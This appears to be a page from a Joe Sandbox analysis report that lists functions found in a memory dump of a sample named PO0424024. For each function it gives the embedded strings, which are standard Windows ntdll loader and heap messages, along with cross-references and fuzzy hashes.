String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: d16f0cb875c0466745e1b0ea0e97c23adf8ee43db1ee8e9c86a4479d842d7f32
Instruction ID: 9f81de8fb4f73a6d07a80d07fb09e3e7a026ba270a1fdc3d62131e910bfd17a0
Opcode Fuzzy Hash: d16f0cb875c0466745e1b0ea0e97c23adf8ee43db1ee8e9c86a4479d842d7f32
Instruction Fuzzy Hash: B3C12A71E002169BDB28DF64CC82B7E77A5AF46720F14C06BE8099B282DB74DD45F392

Uniqueness

Uniqueness Score: -1.00%

Function 00F963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 00FD413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 00FD40D8
minkernel\ntdll\ldrinit.c, xrefs: 00FD40E9, 00FD414B, 00FD420F, 00FD4269
Delaying execution failed with status 0x%08lx, xrefs: 00FD4258
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 00FD41FE
_LdrpInitialize, xrefs: 00FD40DF, 00FD4141, 00FD4205, 00FD425F

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 889d8511e72dec88a52a5e71a1e4e6d6762e9264bbdec56283a69ddd13c42fe7
Instruction ID: 3801119917bf616ba2692abff4a2a3b716c0cf408c9790729238fc667c31a641
Opcode Fuzzy Hash: 889d8511e72dec88a52a5e71a1e4e6d6762e9264bbdec56283a69ddd13c42fe7
Instruction Fuzzy Hash: 51913771E003159BEB35DF58DC46BAA7BA1BB41B24F18012AF940AB3C1D779AC41FB91

Uniqueness

Uniqueness Score: -1.00%

Function 0100F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

Just allocated block at %p for %Ix bytes, xrefs: 0100F708
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0100F809
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 0100F7BE
HEAP: , xrefs: 0100F6F4, 0100F7A1, 0100F7F8
HEAP[%wZ]: , xrefs: 0100F6E7, 0100F794, 0100F7EB
RtlAllocateHeap, xrefs: 0100F56D

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 8b5b3e03e6a28c6904a3022da78d20f207e8c28a01634eccbf03b19fd0374b70
Instruction ID: 38df212ae04ce69f1521e7bb94bd3be9c705cc6dcbbe904f0e7ac62609ae7e2b
Opcode Fuzzy Hash: 8b5b3e03e6a28c6904a3022da78d20f207e8c28a01634eccbf03b19fd0374b70
Instruction Fuzzy Hash: FD912431900B46DFEB22DF78C841AEEBBF1FF49710F188059E5859B692CB399944EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00F5645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

LdrpInitShimEngine, xrefs: 00FB99F4, 00FB9A07, 00FB9A30
minkernel\ntdll\ldrinit.c, xrefs: 00FB9A11, 00FB9A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 00FB9A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00FB9A2A
apphelp.dll, xrefs: 00F56496
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00FB99ED

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: cae7d3514003b6721bda10697ea5e91834921060bf1b123ecee3932f8fffc6b7
Instruction ID: d97340d517761305aaece9c519cde6963be2a114fb42a63602f2d0a4a0f1fe54
Opcode Fuzzy Hash: cae7d3514003b6721bda10697ea5e91834921060bf1b123ecee3932f8fffc6b7
Instruction Fuzzy Hash: 1051E1716483049FD320EF24CC42BAB7BE8FB84754F40491AFA959B191D778E904EB93

Uniqueness

Uniqueness Score: -1.00%

Function 00F8F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FD02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FD02E7
RTL: Re-Waiting, xrefs: 00FD031E

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: a916b450f2e4f0c3a98f54e5c2b1d92803c23223ad1bfa4d36b27cff2388e597
Instruction ID: c733cb2562bd7c77fc060661244c083fe3774ac7b634fd3abc3e671d917cbf32
Opcode Fuzzy Hash: a916b450f2e4f0c3a98f54e5c2b1d92803c23223ad1bfa4d36b27cff2388e597
Instruction Fuzzy Hash: 59E1E231A047419FD725DF28C885B6AB7E1BF84324F240A2EF4A58B3D1DB74D848EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F851EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 00F8522A
Kernel-MUI-Language-SKU, xrefs: 00F8542B
Kernel-MUI-Number-Allowed, xrefs: 00F85247
Kernel-MUI-Language-Allowed, xrefs: 00F8527B
Kernel-MUI-Language-Disallowed, xrefs: 00F85352

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: fc2c4cc781a23d7ac590ca880d949419c84f3769a400fd722b2cea590edc3184
Instruction ID: f8af6d7d0e5c611bd1a95a218c25f1abf58835e046933e2c72bcd1401a97b796
Opcode Fuzzy Hash: fc2c4cc781a23d7ac590ca880d949419c84f3769a400fd722b2cea590edc3184
Instruction Fuzzy Hash: 7CF14D76D10619EFCB15EFA4C981EEEBBB9EF48B50F14406AE401E7211D7749E01EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F770C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00F77C96, 00F78696
HEAP: , xrefs: 00F77C7C, 00F7867F
HEAP[%wZ]: , xrefs: 00F77C6D, 00F78670

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: b018741ad29703f25882e481985d589d838f77c41b78f19fe04a77100c250b96
Instruction ID: 1c97d571844e33dc09e44e4361617315c794e58069775b2925cd84c9fba14f58
Opcode Fuzzy Hash: b018741ad29703f25882e481985d589d838f77c41b78f19fe04a77100c250b96
Instruction Fuzzy Hash: 7B13A170E04655CFDB24CF68C8847A9BBB1BF49314F24C1AAD849AB381D734AC46EF52

Uniqueness

Uniqueness Score: -1.00%

Function 00F71070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 00FC588F
@, xrefs: 00FC5A53
HEAP: , xrefs: 00FC5884
HEAP[%wZ]: , xrefs: 00FC5877

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: 8c12f9a2f934f727153537e7c55d7f1d37bc118b3d08d830c3d3c0d89c45bbe1
Instruction ID: d65673d23acf694f2460d6c9045c75fa6c940b1b590b5fec6bcbe4ee120159f5
Opcode Fuzzy Hash: 8c12f9a2f934f727153537e7c55d7f1d37bc118b3d08d830c3d3c0d89c45bbe1
Instruction Fuzzy Hash: 70924871E01629CFEB24CF18C941BA9B7B5BF45310F1581EAE94DA7281D7349E84EF12

Uniqueness

Uniqueness Score: -1.00%

Function 00F6A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 00F6A3E7
6, xrefs: 00F6A3F7
LdrResFallbackLangList Enter, xrefs: 00F6A3EF
LdrResFallbackLangList Exit, xrefs: 00F6A3FF

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: de4e6a050f2067f0cf56bcb8f3a2e463550f0c827a7118994abcd943d7912628
Instruction ID: 4f40497d74a3907b2374893b6a5d895f66b91f13b678f973bdcace9619614b50
Opcode Fuzzy Hash: de4e6a050f2067f0cf56bcb8f3a2e463550f0c827a7118994abcd943d7912628
Instruction Fuzzy Hash: 23C166755083868FC711CF28C540B6AB7E4FF84714F04896AF896AB261E778CA49EF53

Uniqueness

Uniqueness Score: -1.00%

Function 00F98402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 00F98422
minkernel\ntdll\ldrinit.c, xrefs: 00F98421
@, xrefs: 00F98591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F9855E

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 3ffcfbb878b652b1ed3c867af31f27cbaac45f91364a4ca2c4ceed03f8a62d63
Instruction ID: 70a612520a61db80f3603776ca4aa14da1716dcbfe6cb56a7afda2e6c04d88e4
Opcode Fuzzy Hash: 3ffcfbb878b652b1ed3c867af31f27cbaac45f91364a4ca2c4ceed03f8a62d63
Instruction Fuzzy Hash: B891BEB1508340AFEB21DF64CC41FABB7E8BF857A0F44492EF58492141E734D909AB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FC106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FC0FE5
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FC10AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FC1028

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: b37abb13d03d7b2abbed1bf30a552f41e6356b442c9e7b0417092e380ce33432
Instruction ID: b5eafde329260e7048152e8f5ba27dbaa265584c69e78aacdc622c8929250049
Opcode Fuzzy Hash: b37abb13d03d7b2abbed1bf30a552f41e6356b442c9e7b0417092e380ce33432
Instruction Fuzzy Hash: D371CFB19043459FCB20DF14C886F9B7FA8AF85764F040468F9498B186D778D989EBD2

Uniqueness

Uniqueness Score: -1.00%

Function 010111A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01011261
HEAP: , xrefs: 0101124A, 0101125D, 0101125F, 010112C4
HEAP[%wZ]: , xrefs: 0101123D, 010112B7
This is located in the %s field of the heap header., xrefs: 010112D6

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 068d2d76bd0803cf3c31782c25fdfd739b14133bb2f49af6f40b1a70547f920d
Instruction ID: 0c8991903e03f8a279f61a540d930ccbb4082d14ecc56100e589a2bb35b9766d
Opcode Fuzzy Hash: 068d2d76bd0803cf3c31782c25fdfd739b14133bb2f49af6f40b1a70547f920d
Instruction Fuzzy Hash: C831E0B1200100EFD755DBA8CC81FEA77E8EF05BA0F140095FB81CB295E678E854EA65

Uniqueness

Uniqueness Score: -1.00%

Function 00F8245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 00FCA998
minkernel\ntdll\ldrinit.c, xrefs: 00FCA9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FCA992
apphelp.dll, xrefs: 00F82462

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 11ee87239ff51c3436cbe34fc9a84605ad18df178392882b8d166569e7c2c88d
Instruction ID: 083bf3c1d4c2e13fd0bfcd87431c588693f2fa217dc5b30aab6bbe7c47a21913
Opcode Fuzzy Hash: 11ee87239ff51c3436cbe34fc9a84605ad18df178392882b8d166569e7c2c88d
Instruction Fuzzy Hash: DE313772A00306EBCB30AF599986F6BB7B4FB80718F25001DF840AB245C779AC81E791

Uniqueness

Uniqueness Score: -1.00%

Function 00F59148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 00FBBAAD, 00FBBAEA
HEAP[%wZ]: , xrefs: 00FBBAA0, 00FBBADD
VirtualQuery Failed 0x%p %x, xrefs: 00FBBAF7
VirtualProtect Failed 0x%p %x, xrefs: 00FBBABA

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 3f9b15bc11dd301b5a48b49d475c31be85cd1549b17a915937ec758ecd94d37f
Instruction ID: 0a4423cc447f53861ae0463245c6eaa52eb49aaada366b0ca0b7c599d932fef6
Opcode Fuzzy Hash: 3f9b15bc11dd301b5a48b49d475c31be85cd1549b17a915937ec758ecd94d37f
Instruction Fuzzy Hash: 1C31CE32A00615EFCB01DB49CC89FAEB7B8EF45B71F244051EE14AB291D7B4ED44EA61

Uniqueness

Uniqueness Score: -1.00%

Function 010094E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

, xrefs: 01009B84
, xrefs: 01009AD7
0, xrefs: 01009BF6

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: 3c129df901bcdf215fe6060b61ffd524f1c0b557d2551920bdbeacab9eadd255
Instruction ID: d7e4864748f58c48ed6b66126fd80c7d7ff0711afeb3cbc047ddadbd2eff078f
Opcode Fuzzy Hash: 3c129df901bcdf215fe6060b61ffd524f1c0b557d2551920bdbeacab9eadd255
Instruction Fuzzy Hash: 5B3215B16083419FE361CF68C884B5BBBE5BB88348F04492EF5D987392D775E948CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F61460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00F61728
HEAP: , xrefs: 00F61596
HEAP[%wZ]: , xrefs: 00F61712

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 51c0a880b745aa36bf8642bade258006b95ac9016aeab1ad03d2491470193094
Instruction ID: 41f7deb7f2c6c826359c702af495733f18ab9df65d3bb13063d631545ea1e55d
Opcode Fuzzy Hash: 51c0a880b745aa36bf8642bade258006b95ac9016aeab1ad03d2491470193094
Instruction Fuzzy Hash: B6E10331A042459FDB25CF29C851BBABBF1FF85310F28856DE996CB246DB34E844EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F5A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 00F5A1C1
FilterFullPath, xrefs: 00FBC2E6
\??\, xrefs: 00FBC1E4

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 5c095ab5f54df2610de3c20c3bc043d72ebff6016e299727951ededa8c8b64b9
Instruction ID: f77da04e3da444264fd941909e2b370eab91f71429facf4a6c4afe0e1b9b6fb8
Opcode Fuzzy Hash: 5c095ab5f54df2610de3c20c3bc043d72ebff6016e299727951ededa8c8b64b9
Instruction Fuzzy Hash: 32A17C72D112299BDB31DF64CC89BEAB7B8EF44710F1441EAE908A7250D7399E84DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F6B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

{, xrefs: 00FC37B6
LdrpResGetResourceDirectory Exit, xrefs: 00F6B477
LdrpResGetResourceDirectory Enter, xrefs: 00F6B465

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: 394713c7fbf274538fc722ce8f88adc5a7375a4ef967546f20bb6cee07d057c0
Instruction ID: 63e679a809967a7e0da1be4577bcd2fd14e0b7f7e80363be59258c3b2fafc1d5
Opcode Fuzzy Hash: 394713c7fbf274538fc722ce8f88adc5a7375a4ef967546f20bb6cee07d057c0
Instruction Fuzzy Hash: 8991E072D0425ACFDB21CF58C941BED77B0EF01364F288199E811EB291D7799E80EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F9909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

%, xrefs: 00FD5D3F
@, xrefs: 00F99148
&, xrefs: 00FD5CF8

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 761f5cf4a0980ec28609e730eeafbb0260993b305f99d8123be6266f31360d70
Instruction ID: 55158eec4196d68c8394fcf5428324575eba3aafaf425b9af312d5ae86cbafb3
Opcode Fuzzy Hash: 761f5cf4a0980ec28609e730eeafbb0260993b305f99d8123be6266f31360d70
Instruction Fuzzy Hash: 1171E470A0C3029FEB14DF28C980A6BBBEAFF84728F11491EF4A647251D771D905EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F815F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 00FCA590
Could not validate the crypto signature for DLL %wZ, xrefs: 00FCA589
minkernel\ntdll\ldrmap.c, xrefs: 00FCA59A

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: bd459310f508426d5e3a538d702a69a1f77ce94e288d6151aad09f647b580573
Instruction ID: a38530be8df1cd78b917aea1ed26d152ac63ec7d7dd97b63cfaed96e39b4969b
Opcode Fuzzy Hash: bd459310f508426d5e3a538d702a69a1f77ce94e288d6151aad09f647b580573
Instruction Fuzzy Hash: BC512431A007499BD721EB18CE45BA677E8BF00728F1C4669F9919B2D2E774ED01FB41

Uniqueness

Uniqueness Score: -1.00%

Function 00F5758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

Invalid address specified to %s( %p, %p ), xrefs: 00FBAFCB
HEAP: , xrefs: 00FBAFB8
HEAP[%wZ]: , xrefs: 00FBAFAB

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 5da70fc4a66fa22dc4f22d5e9eec90784703c5236c9088a848bd2cf7b490f375
Instruction ID: f7438d548129efd0d39658b0f13bc97bca5371b5be3249e34237fde3b302ee85
Opcode Fuzzy Hash: 5da70fc4a66fa22dc4f22d5e9eec90784703c5236c9088a848bd2cf7b490f375
Instruction Fuzzy Hash: 83413570A04B40CFDF28DE1EC090BFA77E09F01365F2840A9DA868B646D664DC8DFB12

Uniqueness

Uniqueness Score: -1.00%

Function 0101C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 0101C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0101C1C5
PreferredUILanguages, xrefs: 0101C212

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: d6329d00f5df33132740393a0954870f9a84699b5a76c5656a7c1e65c2101ceb
Instruction ID: aad20698904e2c3a8b5b7017df66fc966416be52946e98979a84e58d8dff3ca2
Opcode Fuzzy Hash: d6329d00f5df33132740393a0954870f9a84699b5a76c5656a7c1e65c2101ceb
Instruction Fuzzy Hash: 10418272E40209EBEF51DAD8CD41FEEBBF8AB04700F04406AEA49B7284D778DE449B50

Uniqueness

Uniqueness Score: -1.00%

Function 00FF4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 00FF4160
LdrpResValidateFilePath Exit, xrefs: 00FF4172
@, xrefs: 00FF4225

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: f61296ae08122abea480b476d218b52240eef53a4d44e40bc28cd5d0e0ff3e67
Instruction ID: 5ba590454568013fb9447c623ff6e05807f82f2b07de06e4bcee301358e4d23c
Opcode Fuzzy Hash: f61296ae08122abea480b476d218b52240eef53a4d44e40bc28cd5d0e0ff3e67
Instruction Fuzzy Hash: 7541F632D0429C8BDB22DB95CC40BBEB7B4FF45350F24046AEA01EB7A1D738A941EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00F933A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

RtlCreateActivationContext, xrefs: 00FD29F9
SXS: %s() passed the empty activation context data, xrefs: 00FD29FE
Actx , xrefs: 00F933AC

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: b39dc6d41e00924e26df7c8f6a040c1595997726d92fb66caa5a0e8d7751c5a1
Instruction ID: 7338d443e37ba6f42d5dc2c07867950c8d37c3d4307691626bff21e553fa19d5
Opcode Fuzzy Hash: b39dc6d41e00924e26df7c8f6a040c1595997726d92fb66caa5a0e8d7751c5a1
Instruction Fuzzy Hash: 0D310332A002059FEF26DE68D881B9677A5EF44B20F16442AFD049F286CB74DE41E790

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 00FEB632
GlobalFlag, xrefs: 00FEB68F
@, xrefs: 00FEB670

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 3e75bdbd007edb768fc9bf0389dc8dd99330389c3448bdbb9dfa9b5a03e59963
Instruction ID: 9afa8a3c284bb78cb359638179082f492c7708708e3a06d4730d4869a190802a
Opcode Fuzzy Hash: 3e75bdbd007edb768fc9bf0389dc8dd99330389c3448bdbb9dfa9b5a03e59963
Instruction Fuzzy Hash: 9C316CB1E00259AFDB10EFA5CC81AEFBBB8EF44744F0404A9EA05E7151D7749E04EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FA1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

BuildLabEx, xrefs: 00FA130F
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00FA127B
@, xrefs: 00FA12A5

Memory Dump Source

